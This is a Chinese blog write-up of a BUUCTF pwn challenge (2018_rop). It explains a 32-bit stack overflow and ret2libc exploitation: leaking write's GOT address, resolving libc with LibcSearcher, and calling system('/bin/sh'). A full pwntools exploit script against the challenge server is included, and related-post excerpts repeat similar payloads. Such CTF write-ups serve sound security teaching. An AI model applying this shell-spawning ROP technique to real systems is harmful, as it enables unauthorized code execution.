[BUUCTF]PWN——铁人三项(第五赛区)_2018_rop

最新推荐文章于 2024-01-08 12:52:27 发布
最新推荐文章于 2024-01-08 12:52:27 发布
阅读量2.3k 收藏 10
点赞数 12
分类专栏: BUUCTF刷题记录 PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mcmuyanga/article/details/108939218
版权
本文详细介绍了如何利用Return-Oriented Programming (ROP)技术,在一个32位程序中通过write函数泄露libc版本,然后计算system和/bin/sh的地址,最终构造payload获取shell。解题步骤包括溢出利用、write函数参数设置、libc搜索和地址计算,以及最终的shell获取过程。
摘要由CSDN通过智能技术生成

铁人三项(第五赛区)_2018_rop[32位libc泄露]

题目附件

解题步骤:
例行检查,32位,开启了NX保护
在这里插入图片描述
试运行一下程序,一开始让我们输入,然后直接输出“Hellow,world”
在这里插入图片描述
32位ida载入,首先习惯性的shift+f12查看一下程序里的字符串,没有发现现成的system(‘/bin/sh’)
从main函数开始看程序
在这里插入图片描述
第4行的函数是我们的输入点,read的buf长度为0x100,而我们参数的大小只有0x88,可以溢出0x78个长度,足够我们构造rop攻击
在这里插入图片描述
没有其他信息了,经典的泄露libc类型的题目

利用思路:

  1. 利用write函数来泄露程序的libc版本
  2. 知道libc版本后去计算程序里的system函数和字符串“/bin/sh”的地址
  3. 覆盖返回地址为system(‘/bin/sh’),获取shell

利用过程:

  1. 泄露libc版本
    这边提一下write函数的原型
ssize_t write(int fd,const void*buf,size_t count);

参数说明:
fd:是文件描述符(write所对应的是写,即就是1)
buf:通常是一个字符串,需要写入的字符串
count:是每次写入的字节数

payload='a'*(0x88+4)+p32(write_plt)+p32(main)+p32(0)+p32(write_got)+p32(4)
r.sendline(payload)
write_addr=u32(r.recv(4))
libc=LibcSearcher('write',write_addr)

这边解释一下第一个payload
首先填充‘a’*(0x88+4)造成溢出,覆盖到返回地址,返回地址填上write函数的plt地址来调用write函数,之后跟上main函数地址(我们要将程序程序重新执行一遍,再次利用输入点来进构造rop)
p32(0)+p32(write_addr)+p32(4)是在设置write函数的参数,对应函数原型看一下,32位程序是4位,所以这边写的4,对应的64位程序是8位

  1. 算出程序的偏移量,计算system和bin/sh的地址
offset=write_addr-libc.dump('write')     #计算偏移量
                                #偏移量=程序里的函数地址-libc里的函数地址
system_addr=offset+libc.dump('system')
bin_sh=offset+libc.dump('str_bin_sh')
  1. 构造rop获取shell
payload='a'*(0x88+4)+p32(system_addr)+p32(0)+p32(bin_sh)

完整EXP:

from pwn import *
from LibcSearcher import *

r=remote('node3.buuoj.cn',27043)
elf=ELF('./2018_rop')

write_plt=elf.plt['write']
write_got=elf.got['write']
main=elf.sym['main']

payload='a'*(0x88+4)+p32(write_plt)+p32(main)+p32(0)+p32(write_got)+p32(4)
r.sendline(payload)
write_addr=u32(r.recv(4))


libc=LibcSearcher('write',write_addr)
offset=write_addr-libc.dump('write')

system_addr=offset+libc.dump('system')
bin_sh=offset+libc.dump('str_bin_sh')

payload='a'*(0x88+4)+p32(system_addr)+p32(0)+p32(bin_sh)

r.sendline(payload)
r.interactive()

在这里插入图片描述
匹配到了多个libc版本,选第一个
泄露libc用到了延迟绑定技术,具体的看这个视频介绍

Angel~Yan
关注
专栏目录
BUUCTF pwn——pwnable_orw
CNS-Enterprise BCC-1701-J
05-06 281
BUUCTF 做题练习
BUUCTF pwn [HarekazeCTF2019]baby_rop
菜的只能随便写写博客
02-13 2627
0x01 文件分析   0x02 运行  一组回显   0x03 IDA  程序之中存在system函数,通过搜索字符串,还能得到’/bin/sh’字符串,一个简单的rop。   0x04 思路  简单rop,利用万能的gadget,pop rdi ret传入字符串并调用system,得到shell。此题flag的位置在/home/babyrop内,可以通过find -name flag...
铁人三项_第五赛区_2018_rop
z1r0的博客
12-05 175
铁人三项_第五赛区_2018_rop 查看保护 溢出,ret2libc from pwn import * context(arch='i386', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote('node4.buuoj.cn', 27080) else: r = process(file_name) elf = ELF(file_name) def dbg(
Buuctf2018_rop
qq_53809201的博客
01-01 213
经过在ida中搜索,发现既没有system函数也没有bin/sh字符串,所以要想办法泄露出libc函数的地址来得到libc版本,找到system函数和bin/sh地址偏移.发现main函数中调用了两个函数。在第二个调用函数中发现了溢出点.
write函数的详细用法
08-26
write函数的详细用法 ssize_t write(int fd, const void *buf, size_t count); 参数: fd: 要进行写操作的文件描述词。 buf: 需要输出的缓冲区 count:最大输出字节计数
write函数的详解与read函数的详解
热门推荐
dangzhangjing97的博客
03-20 8万+
write() 头文件:#include<unistd.h> 原型: ssize_t write(int fd,const void*buf,size_t count); 参数说明: fd:是文件描述符(write所对应的是写,即就是1) buf:通常是一个字符串,需要写入的字符串 count:是每次写入的字节数 返回值: 成功:返回写入的字节数...
BUUCTF--铁人三项(第五赛区)_2018_rop1
最新发布
qq_30528603的博客
01-08 603
我这是打本地的代码,远程的话给了libc用libc,没给libc用LibcSearcher,个人感觉不太好用,很多时候找不到。漏洞点主要在vulnerable_function()函数中。1.第一次布局通过题目中的write,puts等函数将库函数地址泄露,并能返回到主程序。2.通过计算算出libc基地址进一步得到system地址。这题是一题标准的rop。3.找到libc中bin/sh的位置。4.第二次布局就是直接布置rop
write()函数简介
zjhkobe的专栏
07-26 6602
write函数(写入文件)它的主要功能是:将某个文件缓冲区的数据,写入某个文件内。系统调用格式:number = write(handle, buffer, n) ;write函数各个参数定义如下:l         handle:  这是一个已经打开的文件句柄,表示将数据写入这
buuctf 铁人三项(第五赛区)_2018_rop
carol2358的博客
04-26 399
常规的32位泄漏libc,比较蛋痛的是我常规的写法不知道为什么出错,以后要多注意recv到的东西 exp: from pwn import * from LibcSearcher import * local_file = './2018_rop' local_libc = './libc.so.6' remote_libc = './libc.so.6' select = 1 ...
pwn学习资料整理——ROP技术(pwn_rop1)
08-30
pwn学习资料整理——ROP技术(pwn_rop1)
pwn学习资料整理——ROP技术(pwn_rop2)
08-30
pwn学习资料整理——ROP技术(pwn_rop2)
[BUUCTF]PWN-wdb_2018_3rd_soEasy
红凳子的博客
05-07 463
[BUUCTF]PWN-wdb_2018_3rd_soEasy前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、pandas是什么? 二、使用步骤 1.引入库 代码如下(示例): import numpy as np import pandas as pd impo
铁人三项(第五赛区)_2018_rop
Lt95625142的博客
08-25 151
大概就是,0x88+0x04进行栈溢出覆盖返回地址,然后重新载入main函数,接下来利用write函数的三个参数传入信息(这里建议查看一下write函数的三个参数意义,最后一位因为是32位,所以大小是4)看到开了有一个可以写入的函数,然后会输出一些东西,同时在f12之后也没有看到和system以及bin/sh有关的东西。p1过程为了获得write_addr的过程,这里涉及到了延迟绑定机制,注意,这里是32位的程序,和64位先读入寄存器的方式有一点区别。(主要还是针对新手在写,尽量写的详细一点吧)
BUUCTF(pwn)铁人三项(第五赛区)_2018_rop
半岛铁盒的博客
03-30 374
最基本的 rop; from pwn import* from LibcSearcher import* r=remote('node3.buuoj.cn',25292) elf=ELF('./2') write_got=elf.got['write'] write_plt=elf.plt['write'] main=0x80484c6 payload='a'*(0x88+4)+p32(write_plt)+p32(main)+p32(1)+p32(write_got)+p32(4) r.sendl
BUUCTFPWN铁人三项(第五赛区)_2018_rop
m0_55368674的博客
01-15 381
BUUCTFPWN铁人三项(第五赛区)_2018_rop题解
铁人三项(第五赛区)2018 rop
pondzhang的专栏
05-09 528
from pwn import * p = process('./2018_rop') gotwrite = 0x0804A010 pltwrite = 0x080483A0 start = 0x080483C0 bss = 0x0804A020 pltread = 0x08048360 def leak(address): payload = 'a' * 140 + p32(pltwrite) + p32(start) + p32(0x01) + p32(address) + p32(0x04
[PWN]铁人三项(第五赛区)_2018_rop
LDX的博客
11-27 261
[PWN] BUUCTF 铁人三项(第五赛区)_2018_rop
buuctf pwn 第五空间决赛pwn5
09-28
buuctf pwn 第五空间决赛pwn5是一个CTF pwn题,它涉及到格式化字符串漏洞。格式化字符串漏洞是一种常见的安全漏洞,利用这个漏洞可以读取或修改程序的内存中的数据,从而导致程序行为异常或者攻击者获取敏感信息。在这个题目中,攻击者可以通过构造特定的输入来修改程序中的变量,进而获取shell权限。具体的payload可以参考引用和引用中的代码示例。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值